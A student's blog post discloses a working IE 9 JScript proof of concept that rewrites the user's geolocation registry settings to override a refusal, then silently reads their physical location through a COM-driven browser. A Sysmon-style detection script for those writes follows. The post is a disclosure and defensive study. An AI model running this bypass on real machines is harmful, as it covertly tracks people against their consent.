Computer Security
Fall 2010
I want you to learn how to think like an attacker.
—Nick Hopper
My project for Computer Security was analyzing the private browsing mode of Google Chrome. However, what I've done since, I hold, is far more interesting, as it turns out it's really easy to leak your current location in the world with a little help from HTML5's Geolocation API.
I must admit, I had and have some reservations about publishing this one on the web. I did bring it to Microsoft's attention regarding how easy the exploit detailed herein is to do and they told me that everything is working as designed. I can see their angle but I keep coming back to thinking, "Really?" in my own head.
To run the attached, first you need IE 9. Then just save the following source to a file on your computer and run it with cscript from the Windows command line. For extra paranoia-inducing fun, do this while unconnected to a network but with your wireless card still on, as the script can still find you!

```javascript
var bDone = false;

function whereAmI(position) {
    WScript.Echo("Latitude: " + position.coords.latitude);
    WScript.Echo("Longitude: " + position.coords.longitude);
    WScript.Echo("Accuracy: " + position.coords.accuracy + " meters");
    bDone = true;
}

function doNotKnow(e) {
    WScript.Echo('Hello, World');
    bDone = true;
}

//Get a Shell to set a few key keys, note these keys will be for the current user so no UAC prompt will be generated.
var WshShell = WScript.CreateObject("WScript.Shell");

//if user said no to geolocation, overrule them.
WshShell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Geolocation\\BlockAllWebsites", 0, "REG_DWORD");
WshShell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Geolocation\\HostConsent", 1, "REG_BINARY");

//add permission to always allow slides.html5rocks.com to use geolocation service
WshShell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Geolocation\\HostConsent\\slides.html5rocks.com", 0x66, "REG_DWORD");

//Make our good friend IE
var IE = new ActiveXObject("InternetExplorer.Application");
IE.Navigate2("slides.html5rocks.com"); //navigate to the site we know we can exploit.
while (IE.Busy) //wait for navigation to complete.
    WScript.Sleep(100);

//Get our handle to geolocation.
var htmlDoc = IE.Document;
var parentWindow = htmlDoc.parentWindow;
var navigator = parentWindow.navigator;

//where are you?
navigator.geolocation.getCurrentPosition(whereAmI, doNotKnow, {enableHighAccuracy : true, maximumAge : 0, timeout : 5000});

//Wait for the query to complete.
while (!bDone)
    WScript.Sleep(100);

IE.Quit();
```
In summary, what this script does is use the Geolocation object from IE 9 to find out where YOU physically are in the world. It does not matter if you've disabled the Geolocation service in IE 9. You will also not be prompted or warned in any way that you are being tracked. I suspect there are other ways to carry out this exploit; it's just that being able to run IE as a COM object makes it really easy to use.
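The script leaves a clear trace: writes to the current user's `Internet Explorer\Geolocation` values made by a process other than the browser. As an added example that is not part of the original post, here is one way to flag those writes from registry-write telemetry. The event fields are modelled on Sysmon Event ID 13, the sample events are constructed, and treating `iexplore.exe` as the only expected writer is an assumption.

```javascript
// Triage of registry-write events that touch IE's Geolocation settings.
// Event fields (image, targetObject, details) are modelled on Sysmon Event ID 13.
const GEO_KEY = /\\Software\\Microsoft\\Internet Explorer\\Geolocation\\(.+)$/i;
// Assumption: only IE itself (through its consent UI) should change these values.
const EXPECTED_WRITERS = ['iexplore.exe'];

function baseName(path) {
  return path.split('\\').pop().toLowerCase();
}

function dwordValue(details) {
  const m = /^DWORD \(0x([0-9a-f]+)\)$/i.exec(details);
  return m ? parseInt(m[1], 16) : null;
}

// Returns a finding for a suspicious write, or null when the event is not of interest.
function classify(ev) {
  const m = GEO_KEY.exec(ev.targetObject);
  if (!m) return null;                                  // not a Geolocation setting
  const writer = baseName(ev.image);
  if (EXPECTED_WRITERS.includes(writer)) return null;   // browser changing its own setting
  const name = m[1];
  const value = dwordValue(ev.details);
  let reason;
  if (/^BlockAllWebsites$/i.test(name)) {
    reason = value === 0 ? 'block-all switch turned off' : 'block-all switch changed';
  } else if (/^HostConsent\\/i.test(name)) {
    reason = 'per-site consent written for ' + name.slice('HostConsent\\'.length);
  } else {
    reason = 'geolocation setting changed';
  }
  return { writer, name, reason };
}

function findings(events) {
  return events.map(classify).filter(Boolean);
}

// Constructed sample events (placeholder SID), not captured telemetry.
const HKCU = 'HKU\\S-1-5-21-0-0-0-1001\\Software\\Microsoft\\Internet Explorer\\';
const SAMPLE_EVENTS = [
  { image: 'C:\\Windows\\System32\\cscript.exe', targetObject: HKCU + 'Geolocation\\BlockAllWebsites', details: 'DWORD (0x00000000)' },
  { image: 'C:\\Windows\\System32\\cscript.exe', targetObject: HKCU + 'Geolocation\\HostConsent\\slides.html5rocks.com', details: 'DWORD (0x00000066)' },
  { image: 'C:\\Program Files\\Internet Explorer\\iexplore.exe', targetObject: HKCU + 'Geolocation\\BlockAllWebsites', details: 'DWORD (0x00000001)' },
  { image: 'C:\\Windows\\System32\\cscript.exe', targetObject: HKCU + 'Main\\Start Page', details: 'about:blank' },
];
```

Calling `findings(SAMPLE_EVENTS)` returns the two `cscript.exe` writes and skips both the browser's own change and the unrelated `Main` value.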